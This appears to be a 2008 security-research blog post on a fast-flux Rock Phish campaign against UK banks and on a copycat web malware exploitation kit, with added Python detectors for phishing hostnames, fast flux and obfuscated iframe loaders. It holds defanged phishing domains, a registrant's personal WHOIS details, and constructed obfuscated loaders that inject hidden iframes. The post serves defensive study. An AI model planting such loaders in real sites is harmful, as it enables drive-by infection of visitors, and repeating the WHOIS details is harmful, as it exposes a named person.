Tuesday, December 02, 2008

Rock Phish-ing in December

Nothing warms the heart of a security researcher like a batch of currently active Rock Phish domains, fast-fluxing across U.S.-based malware-infected hosts that serve as the campaign's hosting infrastructure. What is this assessment of a currently active Rock Phish campaign meant to achieve? In short, to show that the people who were Rock Phish-ing at the beginning of the year are exactly the same people still Rock Phish-ing at the end of it, and that as long as they remain at large they will keep innovating and working to extend the average time their campaigns stay online.

What is particularly interesting about this campaign is that, compared to previous ones targeting multiple brands, the thousands of malware-infected hosts and domains are aimed almost exclusively at Alliance & Leicester and Abbey National; the few PayPal and Capital One names in the list below are the exception.

Active Rock Phish domains in fast-flux:
stgsfw7sr .com
q06ciwt60 .com
jnlyf96v4 .com
neegzlh35 .com
7azwmrsg5 .com
pn3ekq976 .com
2coxi8sb6 .com
d8ri1iz5d .com
 

ki7wvgauf .com
5nt5r3keh .com
5nt29884j .com
bgoryomek .com
a725jv8ik .com
fke5nnp8m .com
stgsfw7sr .com
10c0ka49t .com
zp304ju3z .com
j0rykafwn .cn
2j1f .net

confirm-updates .com
paypal.confirm-updates .com
user-data-confirmation .com
paypal.user-data-confirmation .com
capitalone.updating-informations .com


Sample sub-domain structure (the brand's real hostname is prepended to a randomly named registered domain):
mybank.alliance-leicester.co.uk.7azwmrsg5 .com
mybank.alliance-leicester.co.uk.bgoryomek .com
mybank.aliance-leicester.co.uk.stgsfw7sr .com
mybank.alliance-leicester.co.uk.zp304ju3z .com
mybank.alliance-leicester.co.uk.5nt29884j .com
mybank.aliance-leicester.co.uk.bgoryomek .com
mybank.alliance-leicester.co.uk.bgoryomek .com
mybank.aliance-leicester.co.uk.stgsfw7sr .com
mybank.alliance-leicester.co.uk.stgsfw7sr .com
mybank.aliance-leicester.co.uk.zp304ju3z .com
mybank.alliance-leicester.co.uk.zp304ju3z .com
myonlineaccounts2.abbeynational.co.uk.pn3ekq976 .com
myonlineaccounts1.abeynational.com.pn3ekq976 .com
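The structure above is the Rock Phish signature: the victim sees mybank.alliance-leicester.co.uk at the start of the address, but the name actually resolves under a throwaway domain such as 7azwmrsg5 .com. The following is an added example (not code from the original post) that mechanises that observation: it refangs the post's "name .com" notation, works out the real registered domain using a small constructed public-suffix table, and flags any hostname whose subdomain labels contain a watched brand, tolerating the one-letter typosquats ("aliance-", "abey-") the campaign itself used. The brand list, suffix table and similarity threshold are assumptions; a production version would use the full Public Suffix List.

```python
"""Flag Rock Phish style hostnames: a bank's real hostname used as the
subdomain prefix of an unrelated, randomly generated registered domain.

Added example, not code from the original post.  The public-suffix table and
brand watch list are constructed subsets; a real deployment would load the
Public Suffix List and the full set of brands it protects."""
import difflib
from typing import List, NamedTuple, Optional

# Constructed: the multi-label public suffixes needed for the hostnames above.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "com.cn"}

# Constructed watch list of brand apex domains (order only decides which brand
# a typosquat is reported against).
BRAND_DOMAINS = (
    "alliance-leicester.co.uk",
    "abbeynational.co.uk",
    "abbeynational.com",
    "paypal.com",
    "capitalone.com",
)

# Similarity above which a label run counts as a one-letter typosquat of a
# brand ("aliance-leicester", "abeynational"); assumed threshold.
TYPO_RATIO = 0.93


class Verdict(NamedTuple):
    hostname: str
    apex: str             # registered domain the name really lives under
    brand: Optional[str]  # brand found in the subdomain labels, if any
    phish: bool


def refang(defanged: str) -> str:
    """Turn the post's 'name .com' notation back into a plain hostname."""
    return "".join(defanged.split()).lower().strip(".")


def registrable_domain(hostname: str) -> str:
    """Public suffix plus one label: 'bgoryomek.com', 'alliance-leicester.co.uk'."""
    labels = hostname.split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def matching_brand(candidate: str) -> Optional[str]:
    """Return the brand a run of labels imitates: the whole brand apex or just
    its leading label ('paypal'), matched exactly or as a close typosquat."""
    for brand in BRAND_DOMAINS:
        for target in (brand, brand.split(".")[0]):
            if candidate == target:
                return brand
            if difflib.SequenceMatcher(None, candidate, target).ratio() >= TYPO_RATIO:
                return brand
    return None


def classify(defanged: str) -> Verdict:
    host = refang(defanged)
    apex = registrable_domain(host)
    if apex in BRAND_DOMAINS:          # the brand's own domain: legitimate
        return Verdict(host, apex, apex, False)
    prefix = host[: -len(apex)].rstrip(".")
    labels = prefix.split(".") if prefix else []
    # Test every contiguous run of subdomain labels, longest runs first.
    for start in range(len(labels)):
        for end in range(len(labels), start, -1):
            brand = matching_brand(".".join(labels[start:end]))
            if brand:
                return Verdict(host, apex, brand, True)
    return Verdict(host, apex, None, False)


def scan(defanged_hosts: List[str]) -> List[Verdict]:
    """Classify a list of defanged hostnames as written in the post."""
    return [classify(h) for h in defanged_hosts]


if __name__ == "__main__":
    SAMPLE = [
        "mybank.alliance-leicester.co.uk.7azwmrsg5 .com",
        "mybank.aliance-leicester.co.uk.stgsfw7sr .com",
        "myonlineaccounts1.abeynational.com.pn3ekq976 .com",
        "paypal.confirm-updates .com",
        "capitalone.updating-informations .com",
        "mybank.alliance-leicester.co.uk",   # the real thing, for contrast
    ]
    for v in scan(SAMPLE):
        state = "PHISH" if v.phish else "ok   "
        print(f"{state} {v.hostname}  apex={v.apex}  brand={v.brand}")
```

The check deliberately keys on the registered domain rather than on the left-most labels, because the whole point of the technique is that the left-most labels look right. Without the multi-label suffix table, mybank.alliance-leicester.co.uk would be reduced to "leicester.co.uk" and the legitimate hostname would be misreported.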


DNS servers for the campaigns:
ns1.thecherrydns .com
ns2.thecherrydns .com
ns3.thecherrydns .com
ns4.thecherrydns .com
ns5.thecherrydns .com
ns6.thecherrydns .com

ns10.realgoodnameserver .com
ns1.realgoodnameserver .com
rens2.realgoodnameserver .com
rns3.realgoodnameserver .com
ns4.realgoodnameserver .com
ns8.realgoodnameserver .com

ns6.myboomdns .com
ns4.myboomdns .com
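What makes these domains "fast-flux" rather than merely hosted on name servers nobody has heard of is visible only when you resolve them repeatedly: a short TTL and a different set of infected hosts, scattered across unrelated networks, on almost every lookup. The block below is an added example (not from the original post) that scores a series of lookup snapshots for that behaviour. The snapshots are constructed, using RFC 1918 addresses in place of the campaign's real hosts; /16 prefixes stand in for the AS numbers a real analysis would resolve, and the rule-based thresholds are assumptions. Two decision methods are shown side by side: the linear flux-score of Holz et al. (NDSS 2008) and a plain rule that demands a short TTL together with churn across many networks.

```python
"""Score repeated DNS lookups for fast-flux behaviour.

Added example, not code from the original post.  The lookup snapshots below
are constructed (RFC 1918 addresses, not the campaign's real hosts); /16
prefixes stand in for AS numbers and the rule thresholds are assumptions."""
import ipaddress
from typing import Dict, List, NamedTuple, Tuple

# (seconds since the first lookup, TTL the resolver returned, A records)
Snapshot = Tuple[int, int, List[str]]

# Constructed data.  Every address is from 10.0.0.0/8 and invented for the
# example; only the first domain name is one listed in the post.
LOOKUPS: Dict[str, List[Snapshot]] = {
    # Fluxed Rock Phish domain: short TTL, a fresh set of compromised hosts in
    # unrelated networks on almost every lookup.
    "7azwmrsg5.com": [
        (0,   300, ["10.11.4.21", "10.37.200.5", "10.52.9.130", "10.73.66.2", "10.88.140.77"]),
        (300, 300, ["10.37.200.5", "10.104.17.9", "10.119.55.214", "10.131.3.8", "10.52.9.130"]),
        (600, 300, ["10.146.72.41", "10.160.23.99", "10.173.8.15", "10.11.4.21", "10.189.250.6"]),
        (900, 300, ["10.201.31.110", "10.214.66.7", "10.227.9.62", "10.240.14.3", "10.104.17.9"]),
    ],
    # Conventional "sitting duck" hosting: one box, long TTL, never changes.
    "sitting-duck.invalid": [
        (0,    86400, ["10.5.5.5"]),
        (3600, 86400, ["10.5.5.5"]),
        (7200, 86400, ["10.5.5.5"]),
    ],
    # A low TTL alone is not flux: round-robin inside a single network.
    "round-robin.invalid": [
        (0,   60, ["10.9.0.11", "10.9.0.12"]),
        (60,  60, ["10.9.0.13", "10.9.0.14"]),
        (120, 60, ["10.9.0.11", "10.9.0.13"]),
    ],
}

FLUX_BOUNDARY = 142.38   # decision boundary published with the Holz et al. score


class FluxStats(NamedTuple):
    domain: str
    lookups: int
    unique_ips: int
    unique_prefixes: int   # distinct /16 networks, our stand-in for ASNs
    min_ttl: int
    churn: float           # mean share of never-before-seen IPs per later lookup


def summarize(domain: str, snaps: List[Snapshot]) -> FluxStats:
    seen, prefixes = set(), set()
    churn_samples: List[float] = []
    for i, (_, _, ips) in enumerate(snaps):
        new = [ip for ip in ips if ip not in seen]
        if i > 0:
            churn_samples.append(len(new) / len(ips))
        seen.update(ips)
        prefixes.update(str(ipaddress.ip_network(f"{ip}/16", strict=False)) for ip in ips)
    churn = sum(churn_samples) / len(churn_samples) if churn_samples else 0.0
    return FluxStats(domain, len(snaps), len(seen), len(prefixes),
                     min(ttl for _, ttl, _ in snaps), churn)


def flux_score(stats: FluxStats) -> float:
    """Linear flux-score of Holz et al. (NDSS 2008): 1.32*nA + 18.54*nASN,
    here with the /16 count approximating nASN."""
    return 1.32 * stats.unique_ips + 18.54 * stats.unique_prefixes


def is_fast_flux(stats: FluxStats) -> bool:
    return flux_score(stats) > FLUX_BOUNDARY


def rule_based_flux(stats: FluxStats) -> bool:
    """Independent sanity check: short TTL AND many networks AND real churn
    (thresholds are assumptions, tuned to separate the three cases above)."""
    return stats.min_ttl <= 600 and stats.unique_prefixes >= 5 and stats.churn >= 0.5


def assess(lookups: Dict[str, List[Snapshot]]) -> Dict[str, Tuple[FluxStats, float, bool]]:
    result = {}
    for domain, snaps in lookups.items():
        stats = summarize(domain, snaps)
        result[domain] = (stats, flux_score(stats), is_fast_flux(stats))
    return result


if __name__ == "__main__":
    for domain, (stats, score, flux) in assess(LOOKUPS).items():
        print(f"{domain:22} ips={stats.unique_ips:2} /16s={stats.unique_prefixes:2} "
              f"ttl={stats.min_ttl:5} churn={stats.churn:.2f} score={score:6.1f} "
              f"{'FAST-FLUX' if flux else 'stable'}")
```

The round-robin case is the one worth keeping in mind: CDNs and load balancers also hand out short TTLs and rotating addresses, which is why network diversity, not TTL, carries most of the weight in the score.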


Domain registrant (WHOIS record as found):
Name : Pan Wei wei
Organization : Pan Wei wei
Address : BaoChun Rd. 27, No. 3, 1F, Apt. 1903
City : Bejing
Province/State : Beijing
Country : CN
Postal Code : 100176
Phone Number : 010-010-58022118-58022118
Fax : 86-010-58022118-58022118
Email : 127@126.com

These well-known Rock Phish campaigners have naturally been multitasking on several different underground fronts throughout the year. For instance, their 2j1f .net is known to have hosted a money mule company's site, and it was also used in a previously analyzed phishing campaign that was spreading across Facebook in June. Need more evidence of the consolidation that has been going on for over a year and a half now? An infamous money mule recruiting company (Cash-Transfers Inc.) was also taking advantage of the fast-flux network offered by the Asprox botnet masters in July.

I am a firm believer that "the whole is greater than the sum of its parts", and I expect the popular "sitting duck" cybercrime hosting model to be replaced either by infrastructure relying entirely on legitimate services, or by one in which the average malware-infected Internet user is temporarily used as a hosting provider.

If millions were made using the "sitting duck" hosting model, how many more would be made using the other two, given that they would inevitably increase the average online time of a malicious campaign?

Related Rock Phish research :
209 Host Locked
209.1 Host Locked
66.1 Host Locked
Confirm Your Gullibility
Assessing a Rock Phish Campaign

Related fast-flux research :
Fast-Flux Spam and Scams Increasing
Fast Fluxing Yet Another Pharmacy Scam
Storm Worm's Fast Flux Networks
Managed Fast Flux Provider
Managed Fast Flux Provider - Part Two
Obfuscating Fast Fluxed SQL Injected Domains
Storm Worm Hosting Pharmaceutical Scams
Fast-Fluxing SQL injection attacks executed from the Asprox botnet

Yet Another Web Malware Exploitation Kit in the Wild

With business-minded malicious attackers embracing basic marketing practices like branding, it is becoming increasingly hard, if not pointless, to keep track of all the XYZ-Packs currently in circulation. How come? Because the kits are effectively open source, anyone can modify one, re-brand it and claim copyright over the result; as a consequence, the source code of a handful of core web malware exploitation kits remains the foundation of each and every newly released kit.

In fact, the practice is becoming so evident that anecdotal evidence, in the form of monitored communications between sellers and buyers, reveals actual attempts at intellectual property enforcement: an exchange of flames between the author of an original kit and a newcomer who appears to have copied over 80% of his source code, changed the layout, re-branded it, added several more exploits and started pitching it as the most exclusive kit available in the underground marketplace.

What is new about this particular kit anyway? Changed iframe and JavaScript obfuscation techniques, no MySQL requirement, and several modified Adobe Acrobat and Flash exploits, all of them patched and publicly obtainable. This is precisely where the marketing pitch ends for the majority of malware kits released during the last quarter.
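"Changed iframe and JavaScript obfuscation" in practice means a new wrapper around the same thing: a one-pixel or invisible iframe pointing at the kit's landing page, written into the compromised site by document.write() of a string that has been percent-escaped or assembled with String.fromCharCode so that a grep for "<iframe" finds nothing. As an added example (not the kit's code and not from the original post), the block below statically unwraps those two decoder layers and then lists the iframes that only appear after decoding, flagging the ones styled to be invisible. SAMPLE_PAGE is a constructed page with two invented loaders pointing at .invalid hosts and one ordinary iframe for contrast.

```python
"""Statically unwrap document.write(unescape(...)) and String.fromCharCode
loaders, then list the iframes that only appear after decoding and flag the
ones styled to be invisible.

Added example, not the kit's code and not from the original post.  SAMPLE_PAGE
is constructed: two invented loaders (.invalid hosts) and one normal iframe."""
import re
from typing import Dict, List, NamedTuple, Optional

SAMPLE_PAGE = r"""<html><body><p>Welcome to our site</p>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//in.example.invalid/in.cgi%3F7%22%20width%3D1%20height%3D1%20frameborder%3D0%3E%3C/iframe%3E'));</script>
<script>var s=String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,108,100,114,46,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,120,46,112,104,112,34,32,115,116,121,108,101,61,34,118,105,115,105,98,105,108,105,116,121,58,104,105,100,100,101,110,34,62,60,47,105,102,114,97,109,101,62);document.write(s);</script>
<iframe src="https://www.example.com/video" width="480" height="320"></iframe>
</body></html>"""

UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")
PCT_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([A-Za-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s: str) -> str:
    """JavaScript unescape(): %XX plus the non-standard %uXXXX form."""
    return PCT_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def deobfuscate(html: str, max_rounds: int = 5) -> str:
    """Replace each decoder call with the string it produces, repeating in
    case one decoded layer reveals another."""
    for _ in range(max_rounds):
        step = UNESCAPE_RE.sub(lambda m: js_unescape(m.group(2)), html)
        step = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
            step)
        if step == html:
            break
        html = step
    return html


class Frame(NamedTuple):
    src: str
    hidden_by: Optional[str]   # why it would be invisible, or None


def parse_attrs(attr_text: str) -> Dict[str, str]:
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "")
            for m in ATTR_RE.finditer(attr_text)}


def hidden_reason(attrs: Dict[str, str]) -> Optional[str]:
    """CSS that hides the frame, or dimensions of at most 1x1 pixel."""
    style = attrs.get("style", "").replace(" ", "").lower()
    for marker in ("visibility:hidden", "display:none"):
        if marker in style:
            return marker
    dims = []
    for key in ("width", "height"):
        try:
            dims.append(int(attrs.get(key, "").rstrip("px") or "-1"))
        except ValueError:          # percentages and the like: not a pixel size
            dims.append(-1)
    if any(0 <= d <= 1 for d in dims):
        return f"{attrs.get('width')}x{attrs.get('height')}"
    return None


def find_iframes(html: str, decode: bool = True) -> List[Frame]:
    """All iframes on the page; with decode=True the loaders are unwrapped first."""
    if decode:
        html = deobfuscate(html)
    frames = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        frames.append(Frame(attrs.get("src", ""), hidden_reason(attrs)))
    return frames


def hidden_iframes(html: str) -> List[Frame]:
    return [f for f in find_iframes(html) if f.hidden_by]


if __name__ == "__main__":
    print("before decoding:", [f.src for f in find_iframes(SAMPLE_PAGE, decode=False)])
    for f in find_iframes(SAMPLE_PAGE):
        print(f"{'HIDDEN ' + f.hidden_by if f.hidden_by else 'visible':28} {f.src}")
```

The decoder is deliberately static (no JavaScript engine), which is exactly why the kits keep changing the wrapper: the moment a scanner learns one encoding, the next release moves to another. Anything this cannot unwrap still has to be run in an instrumented browser.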

As always, there are noticeable exceptions to the common wisdom that time-to-market pressure in the underground leaves no room for innovation, but thankfully these exceptions have not gone mainstream yet. What is going to change in 2009? Web malware exploitation kits are slowly maturing into multi-user cybercrime platforms, where traffic arriving from SQL-injected or malware-embedded sites is automatically exploited, and access to the infected hosts, or to the raw traffic volume itself, is offered for sale at a flat rate or per volume.

Converging traffic management with drive-by exploitation and offering the output for sale, all from a single web interface, is precisely what malicious economies of scale are all about.

Related posts:
Cybercriminals release Christmas themed web malware exploitation kit
New Web Malware Exploitation Kit in the Wild
Modified Zeus Crimeware Kit Gets a Performance Boost 
Zeus Crimeware Kit Gets a Carding Layout
Web Based Malware Emphasizes on Anti-Debugging Features
Copycat Web Malware Exploitation Kit Comes with Disclaimer
Web Based Malware Eradicates Rootkits and Competing Malware
Two Copycat Web Malware Exploitation Kits in the Wild
Copycat Web Malware Exploitation Kits are Faddish
Web Based Botnet Command and Control Kit 2.0
BlackEnergy DDoS Bot Web Based
A New DDoS Malware Kit in the Wild
The Small Pack Web Malware Exploitation Kit
The Nuclear Grabber Kit
The Apophis Kit
Nuclear Malware Kit
The Random JS Malware Exploitation Kit
Metaphisher Malware Kit Spotted in the Wild